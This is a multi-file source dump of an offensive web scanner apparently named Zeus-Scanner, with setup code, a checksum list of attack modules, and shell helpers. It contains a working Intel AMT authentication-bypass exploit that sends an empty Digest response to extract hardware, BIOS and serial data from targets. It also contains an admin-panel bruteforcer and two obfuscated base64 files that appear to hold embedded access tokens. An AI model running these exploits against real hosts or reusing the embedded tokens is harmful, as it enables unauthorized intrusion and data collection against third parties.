216 | use whichcraft to ensure that the driver has been placed in your PATH variable
217 | """
218 | if not whichcraft.which(item):
219 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
220 | "the executable '{}' does not appear to be in your /usr/bin PATH. "
221 | "please untar the correct geckodriver (if not already done) and move "
222 | "it to /usr/bin.".format(item), level=50
223 | ))
224 | exit(-1)
225 | else:
226 | return True
227 |
228 |
229 | def main(rewrite="{}/bin/executed.txt", verbose=False):
230 | """
231 | main method
232 | """
233 | if not check_os():
234 | raise NotImplementedError(lib.core.settings.set_color(
235 | "as of now, Zeus requires Linux to run successfully "
236 | "your current operating system '{}' is not implemented "
237 | "yet".format(platform.platform()), level=50
238 | ))
239 | if check_if_run():
240 | if not disclaimer():
241 | exit(1)
242 | t = threading.Thread(target=animation, args=(
243 | "seems this is your first time running the application, doing setup please wait..",))
244 | t.daemon = True
245 | t.start()
246 | find_tools()
247 | check_xvfb()
248 | untar_gecko()
249 | parse_hosts()
250 | if ensure_placed(verbose=verbose):
251 | with open(rewrite.format(os.getcwd()), "w") as rw:
252 | rw.write("TRUE")
253 | lib.core.settings.logger.info(lib.core.settings.set_color(
254 | "done, continuing process"
255 | ))
256 | else:
257 | pass
258 |
--------------------------------------------------------------------------------
/etc/auths/git_auth:
--------------------------------------------------------------------------------
1 | Vm0wd2VHUXhTWGxTV0d4V1YwZG9jRlZ0TVc5V1JteHlWMjVrVmxKc2NEQlVWbU0xVmpBeFYySkVUbHBXVmxwUVZteFZlRll5VGtsaApSbHBYWld4YVRWWnJaRFJaVjAxNFZHNVdhZ3BTYldodlZGWmFjMDB4WkZkWGJVWmFWbXh3V0ZZeU5VdFhRWEJwVWpKb1dsWlVRbGRUCk1WWlhWMjVPVjJKVldsVlpiRnBIVGtaWmVXVkdaRlprTTBKd1ZXcEtiMWRXWkZoa1JtUnJDazFYVWxoWGExcHZZVEZLYzJOR1FsZGkKV0ZJelZqRmFWbVZYVWtoUFYyaHJUVEJLVlZadGRHdE9SbHBYVjJ4b2JGSnRVbkpEYXpGelYydG9WMDF1VW5aV1IzaHJVMFpXZFZGcwpjR2tLVW01Q1NWWkdVa2RWTWsxNFZtNVNVMkpJUWxkV01GWkxWbFphUjFWcmRHbE5WbHBJVjJ0YWExbFdTa2RUYlVaRVlrWnNNMVJzCldtOVdNVm8yVm10NFdGWnNjRXhhUmxwSFkyczVWd3BYYld0TFZXMTBkMU5XV25OVmEyUlhUVlZzTkZadGVITlpWa3B6VTI1S1ZWWXoKUW5WVWJGcEdaVlpzTm1KR1JsWldlbWMxVVRKak9WQlJiejBLCg==:9
--------------------------------------------------------------------------------
/etc/auths/whois_auth:
--------------------------------------------------------------------------------
1 | Vm0wd2QyUXlWa1pOVldScFVtMVNWRll3WkZOVlJscHpWMjVrVlUxV2NEQlVWbU0xWVdzeFYxWnFUbGRpVkVaSVZteFZlRll5VGtWU2JIQk9VakpvVVZadGVHdFRNVTVJVm10a2FsSnVRazlWYlRWRFZWWmtWMVp0UmxSaVZrWTFWVEp3WVZaSFNraGhSemxWVm14YU0xVnNXbUZqVms1WllVWlNUbFpZUWpaV1ZFa3hVakZXZEZOc1dsaGlSa3BoV1ZSR2QwMHhXbGRYYlhScVRWWndNRlZ0ZUd0VWJGcHpZMFJhVjFadFVUQldha1pUWXpGT2NsWnNTbGRTTTAwMQ==:9
--------------------------------------------------------------------------------
/etc/checksum/md5sum.md5:
--------------------------------------------------------------------------------
1 | 685a20fa3fc7652b5c3e39821cdc6f25 ./zeus.py
2 | 4b32db388e8acda35570c734d27c950c ./etc/scripts/launch_sqlmap.sh
3 | 6ad5f22ec4a6f8324bfb1b01ab6d51ec ./etc/scripts/cleanup.sh
4 | 869025acb457dc881e53e440aa11dd7b ./etc/scripts/reinstall.sh
5 | 155c9482f690f1482f324a7ffd8b8098 ./etc/scripts/fix_pie.sh
6 | 0e435c641bc636ac0b3d54e032d9cf6a ./etc/scripts/install_nmap.sh
7 | 440431165b2db8a537c1a93cb2232f16 ./etc/scripts/install_xvfb.sh
8 | 66b11aa388ea909de7b212341259a318 ./etc/auths/git_auth
9 | 8f686b05c5c5dfc02f0fcaa7ebc8677c ./etc/auths/whois_auth
10 | d3ad89703575a712a0aeead2b176d8c5 ./etc/html/clickjacking_test_page.html
11 | 642a77905d8bb4e5533e0e9c2137c0fa ./etc/text_files/agents.txt
12 | 82cc68f46539d0255f7ce14cd86cd49b ./etc/text_files/link_ext.txt
13 | c57ac34fe965961917ac8a207df256d5 ./etc/text_files/dorks.txt
14 | cf85d83da34d70720193d83950c31fdc ./etc/text_files/xss_payloads.txt
15 | 6cabeb9919d2301efc4ba3d8869282d6 ./etc/checksum/md5sum.md5
16 | 5250f0aa13b8af4775efa506e77de1ce ./etc/xml/headers.xml
17 | d41d8cd98f00b204e9800998ecf8427e ./bin/__init__.py
18 | 3be7ee6f4267e0d0cf2143b58792527b ./bin/paths/path_config.ini
19 | fa5084cc7ee56ff2df8631b76be5be4d ./bin/unzip_gecko.py
20 | c0d83f0b82a6b30de8811e69e6d95c61 ./bin/executed.txt
21 | dc1eb4ebe0f372af48b5a9c107ebc68d ./bin/drivers/geckodriver-v0.18.0-linux32.tar.gz
22 | be18faeea6e7db9db6990d8667e2298f ./bin/drivers/geckodriver-v0.17.0-linux64.tar.gz
23 | 79b1a158f96d29942a111c0905f1c807 ./bin/drivers/geckodriver-v0.17.0-linux32.tar.gz
24 | ca6935a72fd0527d15a78a17a35e56e8 ./bin/drivers/geckodriver-v0.19.0-linux64.tar.gz
25 | 4ccb56fb3700005c9f9188f84152f21a ./bin/drivers/geckodriver-v0.18.0-linux64.tar.gz
26 | 07cd383c8aef8ea5ef194a506141afd6 ./bin/drivers/geckodriver-v0.19.0-linux32.tar.gz
27 | 145e4a7dc985e99962dabe3b221fc51e ./lib/tamper_scripts/obfuscateordinal_encode.py
28 | 10bf1bc4ef0287d31633148fab557e8a ./lib/tamper_scripts/uppercase_encode.py
29 | fcef22874b6732fd1b1bd062e18e65db ./lib/tamper_scripts/hex_encode.py
30 | 1537b3b94566aebf0f89bed074e96581 ./lib/tamper_scripts/url_encode.py
31 | d41d8cd98f00b204e9800998ecf8427e ./lib/tamper_scripts/__init__.py
32 | 7b636a332b2e99547ec9565d8e094308 ./lib/tamper_scripts/unicode_encode.py
33 | 07a792bccd13f64873a27aee4aaa8ea6 ./lib/tamper_scripts/space2comment_encode.py
34 | 1053a0c89e514d2c94bc822d34715896 ./lib/tamper_scripts/randomcase_encode.py
35 | 349c30cbab4308bd94829d92b4e34f9d ./lib/tamper_scripts/lowercase_encode.py
36 | 0c5e78674a8d27e7c20af1dca8656789 ./lib/tamper_scripts/enclosebrackets_encode.py
37 | 5824916df46428a8304ee0156bcee989 ./lib/tamper_scripts/multispace2comment_encode.py
38 | 9fd42d65993aa20d1bf5acbc4d042d2e ./lib/tamper_scripts/base64_encode.py
39 | f77b7a9a19b94e26903eeecf5a787ea3 ./lib/tamper_scripts/space2null_encode.py
40 | 3b8c95a6a3b7cecce5118f2fb1ccc6b8 ./lib/tamper_scripts/appendnull_encode.py
41 | 8e8792e38649f18d90bb0084202bb59e ./lib/tamper_scripts/obfuscateentity_encode.py
42 | d41d8cd98f00b204e9800998ecf8427e ./lib/__init__.py
43 | 6299b188a730844954044887f528435a ./lib/firewall/cloudfront.py
44 | d41d8cd98f00b204e9800998ecf8427e ./lib/firewall/__init__.py
45 | 81a29a14d72980a306fbaec0dc772048 ./lib/firewall/fortigate.py
46 | d4986f3d95a773d7c3585b07bcd6310e ./lib/firewall/sucuri.py
47 | 763af6773e920d6bdc185f5bd4df6084 ./lib/firewall/dw.py
48 | e4514021485dbb94c3f0023b04af01ad ./lib/firewall/aws.py
49 | eb3a3066efbcf87dbc10a49be445cb8f ./lib/firewall/urlscan.py
50 | 71744d7a95f42063a8fb6e720932cd3d ./lib/firewall/sonicwall.py
51 | 7af3ee8615c7dc761f050e0ba638eaef ./lib/firewall/armor.py
52 | 1f303641d59686d544f2986ff74c6b31 ./lib/firewall/webseal.py
53 | 78e6b01feb9bad68c2fc8a79e75930fd ./lib/firewall/yundun.py
54 | e4eef006dd909c222b1b9f48826c3ef5 ./lib/firewall/pk.py
55 | bf5285dc059c761e1719bc734ae8504f ./lib/firewall/varnish.py
56 | 6b370050b40d8c1d2221424f756c7842 ./lib/firewall/paloalto.py
57 | 73c1727e604ec6e00541687bfc64c0d6 ./lib/firewall/akamai.py
58 | 6bbe2f6f6a2a1ddf0e416e94ec1f0763 ./lib/firewall/siteguard.py
59 | 787e21ed577ff05b095aa0f0e5e5e9bf ./lib/firewall/cloudflare.py
60 | c3f01fc8ff7dfe7759f63bf16b00f127 ./lib/firewall/wordfence.py
61 | 2f0a935d2bb9b8aa711e511f48595a81 ./lib/firewall/powerful.py
62 | bbd8b4c6100070d420d48dc7dfc297eb ./lib/firewall/webknight.py
63 | 54815706261c32b57fbbdc99244b5cdd ./lib/firewall/modsecurity.py
64 | 9070b43428bd17fd5faf86995cb559a2 ./lib/firewall/stringray.py
65 | 5ee20e2c158d0734b4dd5a8eb47f8ea5 ./lib/firewall/squid.py
66 | 95b908a21c0ff456ae59df4c6c189c54 ./lib/firewall/wallarm.py
67 | cb45428e92485b759ff5cb46a0be9c73 ./lib/firewall/yunsuo.py
68 | 8fc8d62377bebbfa7ca4d70a79eab115 ./lib/firewall/bigip.py
69 | 6ea65a0160c21e144e92334acc2e3667 ./lib/firewall/anquanbao.py
70 | 22a0ad8f2fa1a16b651cb5ae37ca9b0d ./lib/firewall/generic.py
71 | ed18ed1f72f3887e63fa7ce060841e4a ./lib/plugins/aardvark.py
72 | a8b3e6924bab72607b1d1c1a8dcb561d ./lib/plugins/4d.py
73 | 03355a122c047dc598fc271620119978 ./lib/plugins/jquery.py
74 | d41d8cd98f00b204e9800998ecf8427e ./lib/plugins/__init__.py
75 | 353db8b22c031433ea73a12943927557 ./lib/plugins/clipbucket.py
76 | 5908a81cc9b332348b26a3ccd5ddb798 ./lib/plugins/ihtml.py
77 | d76d2839ed8875739328bb5f2a838ba6 ./lib/plugins/360.py
78 | 16e4708c510811760129f6fb4842e92e ./lib/plugins/3dcart.py
79 | 2ce0a2101bb5706a136de83a729965f3 ./lib/plugins/b2evolution.py
80 | 497facc7b12e6e691aab65980d8f5026 ./lib/plugins/bmcremedy.py
81 | 2dcee5bc924732dd21f16983eef9a99d ./lib/plugins/abyss.py
82 | d2c100e6e6f7fbda8448d36a6928c979 ./lib/plugins/68classified.py
83 | f1eb201cce16853049a615805b01bc60 ./lib/plugins/bomgar.py
84 | ce3b79dc80e369ffd55d2cbe90e6a0ab ./lib/plugins/mssqlreportmanager.py
85 | 55ec8cde9d438a90327911910164abf2 ./lib/plugins/opengraph.py
86 | 8658f8a185499ec6d10b1d2da6104c27 ./lib/plugins/atomfeed.py
87 | c2533d4a8dc5fdaa4b8d584588b32ec2 ./lib/plugins/html5.py
88 | a3ed012f11ff2bffbc143fbef63d0c12 ./lib/plugins/3com.py
89 | 55d834ae87e96787807e21b65ec68bca ./lib/plugins/moodle.py
90 | 44019a327ec1db91851d652630788742 ./lib/plugins/googleapi.py
91 | c4ac50a3f3550c62219e7e4f38d4b496 ./lib/plugins/1024.py
92 | 0b63885649f369ea410c8169e947fdab ./lib/plugins/accellion.py
93 | 76a1d1decfb872bfafdf510c656f113a ./lib/plugins/rssfeed.py
94 | 320f0db977c85b477ba1ea78b140cb8a ./lib/plugins/4images.py
95 | 35dc8b7da4becb60662aab3c48a9210b ./lib/plugins/openxchange.py
96 | bdb7ff546787d38bbbd0aac9d4a4cdf8 ./lib/attacks/clickjacking_scan/__init__.py
97 | d41d8cd98f00b204e9800998ecf8427e ./lib/attacks/__init__.py
98 | 6e9e0a9e2c72e00d8690c0177b695d56 ./lib/attacks/sqlmap_scan/__init__.py
99 | 5e5bb575014ebe613db6bf671d008cf8 ./lib/attacks/sqlmap_scan/sqlmap_opts.py
100 | d41d8cd98f00b204e9800998ecf8427e ./lib/attacks/whois_lookup/__init__.py
101 | c5b69617f040fef1d5930948905aa8d0 ./lib/attacks/whois_lookup/whois.py
102 | 4fd96bb3002e949687d7ae863ee87264 ./lib/attacks/admin_panel_finder/__init__.py
103 | 2017e69c3420c9e240fccb310f086da7 ./lib/attacks/xss_scan/__init__.py
104 | 40ba04fb18dcbb81cb42376a825c238f ./lib/attacks/nmap_scan/__init__.py
105 | 216999fa0e84866d5c1d96d5676034e4 ./lib/attacks/nmap_scan/nmap_opts.py
106 | 0114ebe3d45612ef143f2777f027374c ./lib/header_check/__init__.py
107 | 2a8acb2191d80da75f0e4d09c00df9f6 ./lib/core/common.py
108 | de4254c5e40f7aa4fb81e0608f758a2c ./lib/core/decorators.py
109 | 3f045c64ef155a517b7a3f3b66905325 ./lib/core/errors.py
110 | d41d8cd98f00b204e9800998ecf8427e ./lib/core/__init__.py
111 | 0faeed8eac30526f3751dd67fe5c9f7e ./lib/core/settings.py
112 | 27bce5d5d1e7d01788c5273016b19370 ./lib/core/parse.py
113 | d41d8cd98f00b204e9800998ecf8427e ./var/__init__.py
114 | d41d8cd98f00b204e9800998ecf8427e ./var/auto_issue/__init__.py
115 | c58e73857e42a07fa6eb559433b32c1a ./var/auto_issue/github.py
116 | 503e44b36f0bcd81e20840be5b73320e ./var/search/__init__.py
117 | c52867e57beeeeac2da57f597b644faf ./var/search/selenium_search.py
118 | 12340de27a75273cd444f7257d354311 ./var/search/pgp_search.py
119 | 0af5ab455a535a2f141cfae4758a4bb4 ./var/blackwidow/__init__.py
--------------------------------------------------------------------------------
/etc/deprecated/intel_me/__init__.py:
--------------------------------------------------------------------------------
1 | # Intel AMY bypass scanner is being deprecated and will be completely remove by version 1.3
2 | # the reason for the deprecation is that it serves really no purpose. You will most likely
3 | # not find a vulnerability from a webpage with this attack assessment.
4 | # The code will stay but will be moved to a new folder under etc, that will be called
5 | # deprecated
6 | # TODO:/ move code into deprecated folder
7 |
8 | import json
9 | import re
10 | import socket
11 |
12 | import requests
13 |
14 | import lib.core.settings
15 |
16 | from lxml import html
17 | from var.auto_issue.github import request_issue_creation
18 |
19 |
20 | def __get_auth_headers(target, port, **kwargs):
21 | """
22 | get the authorization headers from the URL
23 | """
24 | source = kwargs.get("source", None)
25 | proxy, agent, verbose = kwargs.get("proxy", None), kwargs.get("agent", None), kwargs.get("verbose", False)
26 | if not source or 'WWW-Authenticate' not in source.headers['WWW-Authenticate']:
27 | lib.core.settings.logger.info(lib.core.settings.set_color(
28 | "header value not established, attempting to get bypass..."
29 | ))
30 | source = requests.get("http://{0}:{1}/index.htm".format(target, port), timeout=10, headers={
31 | 'connection': 'close', 'user-agent': agent
32 | }, proxies=proxy)
33 | return source
34 | # Get digest and nonce and return the new header
35 | elif 'WWW-Authenticate' in source.headers:
36 | lib.core.settings.logger.info(lib.core.settings.set_color(
37 | "header value established successfully, attempting authentication..."
38 | ))
39 | data = re.compile('Digest realm="Digest:(.*)", nonce="(.*)",stale="false",qop="auth"').search(
40 | source.headers['WWW-Authenticate'])
41 | digest = data.group(1)
42 | nonce = data.group(2)
43 | return 'Digest username="admin", ' \
44 | 'realm="Digest:{0}", nonce="{1}", ' \
45 | 'uri="/index.htm", response="", qop=auth, ' \
46 | 'nc=00000001, cnonce="deadbeef"'.format(digest, nonce)
47 | else:
48 | lib.core.settings.logger.info(lib.core.settings.set_color(
49 | "nothing found, will skip URL..."
50 | ))
51 | return None
52 |
53 |
54 | def __get_raw_data(target, page, port, agent=None, proxy=None, **kwargs):
55 | """
56 | collect all the information from an exploitable target
57 | """
58 | verbose = kwargs.get("verbose", False)
59 | lib.core.settings.logger.info(lib.core.settings.set_color(
60 | "attempting to get raw hardware information..."
61 | ))
62 | return requests.get("http://{0}:{1}/{2}.htm".format(target, port, page),
63 | headers={
64 | 'connection': 'close',
65 | 'Authorization': __get_auth_headers(target, port, verbose=verbose),
66 | 'user-agent': agent
67 | }, proxies=proxy)
68 |
69 |
70 | def __get_hardware(target, port, agent=None, proxy=None, verbose=False):
71 | """
72 | collect all the hardware information from an exploitable target
73 | """
74 | req = __get_raw_data(target, 'hw-sys', port, agent=agent, proxy=proxy, verbose=verbose)
75 | if not req.status_code == 200:
76 | return None
77 | lib.core.settings.logger.info(lib.core.settings.set_color(
78 | "connected successfully getting hardware info..."
79 | ))
80 | tree = html.fromstring(req.content)
81 | raw = tree.xpath('//td[@class="r1"]/text()')
82 | bios_functions = tree.xpath('//td[@class="r1"]/table//td/text()')
83 | # find the hardware information
84 | # and output the hardware data
85 | # from the raw data found
86 | data = {
87 | 'platform': {
88 | 'model': raw[0],
89 | 'manufacturer': raw[1],
90 | 'version': raw[2],
91 | 'serial': raw[4],
92 | 'system_id': raw[5]
93 | },
94 | 'baseboard': {
95 | 'manufacturer': raw[6],
96 | 'name': raw[7],
97 | 'version': raw[8],
98 | 'serial': raw[9],
99 | 'tag': raw[10],
100 | 'replaceable': raw[11]
101 | },
102 | 'bios': {
103 | 'vendor': raw[12],
104 | 'version': raw[13],
105 | 'date': raw[14],
106 | 'functions': bios_functions
107 | }
108 | }
109 | return json.dumps(data)
110 |
111 |
112 | def main_intel_amt(url, agent=None, proxy=None, **kwargs):
113 | """
114 | main attack method to be called
115 | """
116 | do_ip_address = kwargs.get("do_ip", False)
117 | verbose = kwargs.get("verbose", False)
118 | proxy = lib.core.settings.proxy_string_to_dict(proxy) or None
119 | agent = agent or lib.core.settings.DEFAULT_USER_AGENT
120 | port_list = (16993, 16992, 693, 692)
121 | if do_ip_address:
122 | lib.core.settings.logger.warning(lib.core.settings.set_color(
123 | "running against IP addresses may result in the targets refusing the connection...", level=30
124 | ))
125 | lib.core.settings.logger.info(lib.core.settings.set_color(
126 | "will run against IP address instead of hostname..."
127 | ))
128 | try:
129 | url = lib.core.settings.replace_http(url)
130 | url = "http://{}".format(socket.gethostbyname(url))
131 | lib.core.settings.logger.info(lib.core.settings.set_color(
132 | "discovered IP address {}...".format(url)
133 | ))
134 | except Exception as e:
135 | lib.core.settings.logger.error(lib.core.settings.set_color(
136 | "failed to gather IP address from hostname '{}', received an error '{}'. "
137 | "will just run against hostname...".format(url, e), level=40
138 | ))
139 | url = url
140 | lib.core.settings.logger.info(lib.core.settings.set_color(
141 | "attempting to connect to '{}' and get hardware info...".format(url)
142 | ))
143 | for port in list(port_list):
144 | if verbose:
145 | lib.core.settings.logger.debug(lib.core.settings.set_color(
146 | "trying on port {}...".format(port), level=10
147 | ))
148 | try:
149 | json_data = __get_hardware(url, port, agent=agent, proxy=proxy, verbose=verbose)
150 | if json_data is None:
151 | lib.core.settings.logger.error(lib.core.settings.set_color(
152 | "unable to get any information, skipping...", level=40
153 | ))
154 | pass
155 | else:
156 | print("-" * 40)
157 | for key in json_data.keys():
158 | print("{}:".format(str(key).capitalize()))
159 | for item in json_data[key]:
160 | print(" - {}: {}".format(item.capitalize(), json_data[key][item]))
161 | print("-" * 40)
162 | except requests.exceptions.ConnectionError as e:
163 | if "Max retries exceeded with url" in str(e):
164 | lib.core.settings.logger.error(lib.core.settings.set_color(
165 | "failed connection, target machine is actively refusing the connection, skipping...", level=40
166 | ))
167 | pass
168 | else:
169 | lib.core.settings.logger.error(lib.core.settings.set_color(
170 | "failed connection with '{}', skipping...", level=40
171 | ))
172 | pass
173 | except Exception as e:
174 | if "Temporary failure in name resolution" in str(e):
175 | lib.core.settings.logger.error(lib.core.settings.set_color(
176 | "failed to connect on '{}', skipping...".format(url), level=40
177 | ))
178 | pass
179 | else:
180 | lib.core.settings.logger.exception(lib.core.settings.set_color(
181 | "ran into exception '{}', cannot continue...".format(e), level=50
182 | ))
183 | request_issue_creation()
184 |
--------------------------------------------------------------------------------
/etc/html/clickjacking_test_page.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/etc/scripts/cleanup.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | for pid in $(ps -ef | grep "firefox" | awk '{print $2}'); do kill -9 ${pid}; done > /dev/null 2>&1
--------------------------------------------------------------------------------
/etc/scripts/fix_pie.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | sudo rm -rf /tmp.x0-lock
4 | sudo apt-get purge --yes --force-yes xvfb
5 | sudo apt-get install --yes --force-yes xvfb
--------------------------------------------------------------------------------
/etc/scripts/install_nmap.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | sudo apt-get install nmap
--------------------------------------------------------------------------------
/etc/scripts/install_xvfb.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 |
4 | sudo apt-get install xvfb --yes > /dev/null 2>&1
--------------------------------------------------------------------------------
/etc/scripts/launch_sqlmap.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | USR_PATH=$2
4 |
5 | python "$USR_PATH/sqlmapapi.py" -s
--------------------------------------------------------------------------------
/etc/scripts/reinstall.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | for pid in $(ps -ef | grep "firefox" | awk '{print $2}'); do kill -9 ${pid}; done > /dev/null 2>&1
4 | mv ~/.mozilla ~/.mozilla.old > /dev/null 2>&1
5 | rm /usr/lib/firefox* > /dev/null 2>&1
6 | sudo apt-get update > /dev/null 2>&1
7 | sudo apt-get --purge --reinstall --assume-yes install firefox=56.0 > /dev/null 2>&1
8 | sudo pip2 install selenium -U > /dev/null 2>&1
9 |
--------------------------------------------------------------------------------
/etc/xml/headers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/lib/__init__.py
--------------------------------------------------------------------------------
/lib/attacks/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/lib/attacks/__init__.py
--------------------------------------------------------------------------------
/lib/attacks/admin_panel_finder/__init__.py:
--------------------------------------------------------------------------------
1 | import os
2 | import threading
3 |
4 | try: # Python 2
5 | from urllib.request import urlopen
6 | from urllib.error import HTTPError
7 | except ImportError: # Python 3
8 | from urllib2 import urlopen, HTTPError
9 |
10 | from requests.exceptions import (
11 | ConnectionError,
12 | TooManyRedirects,
13 | ReadTimeout
14 | )
15 |
16 | import lib.core.common
17 | import lib.core.settings
18 | from var.auto_issue.github import request_issue_creation
19 |
20 |
21 | def check_for_externals(url, data_sep="-" * 30, **kwargs):
22 | """
23 | check if the URL has a robots.txt in it and collect `interesting` information
24 | out of the page
25 | """
26 | robots = kwargs.get("robots", False)
27 | sitemap = kwargs.get("sitemap", False)
28 | verbose = kwargs.get("verbose", False)
29 | batch = kwargs.get("batch", False)
30 |
31 | ext = {
32 | robots: "/robots.txt",
33 | sitemap: "/sitemap.xml"
34 | }
35 | currently_searching = ext[robots if robots else sitemap]
36 | if verbose:
37 | lib.core.settings.logger.debug(lib.core.settings.set_color(
38 | "currently searching for a '{}'".format(currently_searching), level=10
39 | ))
40 |
41 | try:
42 | url = lib.core.settings.replace_http(url)
43 | full_url = "{}{}{}".format("http://", url, currently_searching)
44 | _, code, data, _ = lib.core.common.get_page(full_url)
45 | except (TooManyRedirects, ConnectionError, ReadTimeout):
46 | lib.core.settings.logger.error(lib.core.settings.set_color(
47 | "connection to '{}' failed, assuming does not exist and continuing".format(full_url), level=40
48 | ))
49 | return False
50 |
51 | if code == 404:
52 | lib.core.settings.logger.error(lib.core.settings.set_color(
53 | "unable to connect to '{}', assuming does not exist and continuing".format(
54 | full_url
55 | ), level=40
56 | ))
57 | return False
58 | if robots:
59 | interesting = set()
60 | for line in data.split("\n"):
61 | if "Allow" in line:
62 | interesting.add(line.strip())
63 | if len(interesting) > 0:
64 | lib.core.settings.create_tree(full_url, list(interesting))
65 | else:
66 | question_msg = "nothing interesting found in robots.txt would you like to display the entire page"
67 | if not batch:
68 | to_display = lib.core.common.prompt(
69 | question_msg, opts="yN"
70 | )
71 | else:
72 | to_display = lib.core.common.prompt(
73 | question_msg, opts="yN", default="n"
74 | )
75 |
76 | if to_display.lower().startswith("y"):
77 | print(
78 | "{}\n{}\n{}".format(
79 | data_sep, data, data_sep
80 | )
81 | )
82 | lib.core.settings.logger.info(lib.core.settings.set_color(
83 | "robots.txt page will be saved into a file", level=25
84 | ))
85 | return lib.core.common.write_to_log_file(
86 | data, lib.core.settings.ROBOTS_PAGE_PATH, lib.core.settings.ROBOTS_TXT_FILENAME.format(
87 | lib.core.settings.replace_http(url)
88 | )
89 | )
90 | elif sitemap:
91 | lib.core.settings.logger.info(lib.core.settings.set_color(
92 | "found a sitemap, saving to file", level=25
93 | ))
94 | return lib.core.common.write_to_log_file(
95 | data, lib.core.settings.SITEMAP_FILE_LOG_PATH, lib.core.settings.SITEMAP_FILENAME.format(
96 | lib.core.settings.replace_http(url)
97 | )
98 | )
99 |
100 |
101 | def check_for_admin_page(url, exts, protocol="http://", **kwargs):
102 | """
103 | bruteforce the admin page of given URL
104 | """
105 | verbose = kwargs.get("verbose", False)
106 | show_possibles = kwargs.get("show_possibles", False)
107 | possible_connections, connections = set(), set()
108 | stripped_url = lib.core.settings.replace_http(str(url).strip())
109 | for ext in exts:
110 | # each extension is loaded before this process begins to save time
111 | # while running this process.
112 | # it will be loaded and passed instead of loaded during.
113 | ext = ext.strip()
114 | true_url = "{}{}{}".format(protocol, stripped_url, ext)
115 | if verbose:
116 | lib.core.settings.logger.debug(lib.core.settings.set_color(
117 | "trying '{}'".format(true_url), level=10
118 | ))
119 | try:
120 | urlopen(true_url, timeout=5)
121 | lib.core.settings.logger.info(lib.core.settings.set_color(
122 | "connected successfully to '{}'".format(true_url), level=25
123 | ))
124 | connections.add(true_url)
125 | except HTTPError as e:
126 | data = str(e).split(" ")
127 | if verbose:
128 | if "Access Denied" in str(e):
129 | lib.core.settings.logger.warning(lib.core.settings.set_color(
130 | "got access denied, possible control panel found without external access on '{}'".format(
131 | true_url
132 | ),
133 | level=30
134 | ))
135 | possible_connections.add(true_url)
136 | else:
137 | for error_code in lib.core.common.STATUS_CODES.iterkeys():
138 | if int(data[2].split(":")[0]) == error_code:
139 | lib.core.settings.logger.error(lib.core.settings.set_color(
140 | "failed to connect got error code {} (reason: {})".format(
141 | data[2], lib.core.common.STATUS_CODES[error_code]
142 | ), level=40
143 | ))
144 | except Exception as e:
145 | if verbose:
146 | if "" or "timeout: timed out" in str(e):
147 | lib.core.settings.logger.warning(lib.core.settings.set_color(
148 | "connection timed out assuming won't connect and skipping", level=30
149 | ))
150 | else:
151 | lib.core.settings.logger.exception(lib.core.settings.set_color(
152 | "failed to connect with unexpected error '{}'".format(str(e)), level=50
153 | ))
154 | request_issue_creation()
155 | possible_connections, connections = list(possible_connections), list(connections)
156 | data_msg = "found {} possible connections(s) and {} successful connection(s)"
157 | lib.core.settings.logger.info(lib.core.settings.set_color(
158 | data_msg.format(len(possible_connections), len(connections))
159 | ))
160 | if len(connections) > 0:
161 | # create the connection tree if we got some connections
162 | lib.core.settings.logger.info(lib.core.settings.set_color(
163 | "creating connection tree"
164 | ))
165 | lib.core.settings.create_tree(url, connections)
166 | else:
167 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
168 | "did not receive any successful connections to the admin page of "
169 | "{}".format(url), level=50
170 | ))
171 | if show_possibles:
172 | if len(possible_connections) > 0:
173 | lib.core.settings.logger.info(lib.core.settings.set_color(
174 | "creating possible connection tree"
175 | ))
176 | lib.core.settings.create_tree(url, possible_connections)
177 | else:
178 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
179 | "did not find any possible connections to {}'s "
180 | "admin page".format(url), level=50
181 | ))
182 | if len(connections) > 0:
183 | lib.core.settings.logger.warning(lib.core.settings.set_color(
184 | "only writing successful connections to log file", level=30
185 | ))
186 | lib.core.common.write_to_log_file(
187 | list(connections),
188 | lib.core.settings.ADMIN_PAGE_FILE_PATH,
189 | lib.core.settings.ADMIN_PAGE_FILENAME.format(
190 | lib.core.settings.replace_http(url)
191 | )
192 | )
193 |
194 |
195 | def __load_extensions(filename="{}/etc/text_files/link_ext.txt"):
196 | """
197 | load the extensions to use from the etc/link_ext file
198 | """
199 | # this is where the extensions are loaded from
200 | with open(filename.format(os.getcwd())) as ext:
201 | return ext.readlines()
202 |
203 |
204 | def main(url, show=False, verbose=False, **kwargs):
205 | """
206 | main method to be called
207 | """
208 | do_threading = kwargs.get("do_threading", False)
209 | proc_num = kwargs.get("proc_num", 5)
210 | batch = kwargs.get("batch", False)
211 |
212 | try:
213 | lib.core.settings.logger.info(lib.core.settings.set_color(
214 | "parsing robots.txt"
215 | ))
216 | results = check_for_externals(url, robots=True, batch=batch)
217 | if not results:
218 | lib.core.settings.logger.warning(lib.core.settings.set_color(
219 | "seems like this page is either blocking access to robots.txt or it does not exist", level=30
220 | ))
221 | lib.core.settings.logger.info(lib.core.settings.set_color(
222 | "checking for a sitemap"
223 | ))
224 | check_for_externals(url, sitemap=True)
225 | lib.core.settings.logger.info(lib.core.settings.set_color(
226 | "loading extensions"
227 | ))
228 | extensions = __load_extensions()
229 | if verbose:
230 | lib.core.settings.logger.debug(lib.core.settings.set_color(
231 | "loaded a total of {} extensions".format(len(extensions)), level=10
232 | ))
233 | lib.core.settings.logger.info(lib.core.settings.set_color(
234 | "attempting to bruteforce admin panel"
235 | ))
236 | if do_threading:
237 | lib.core.settings.logger.warning(lib.core.settings.set_color(
238 | "starting {} threads, you will not be able to end the process until "
239 | "it is completed".format(proc_num), level=30
240 | ))
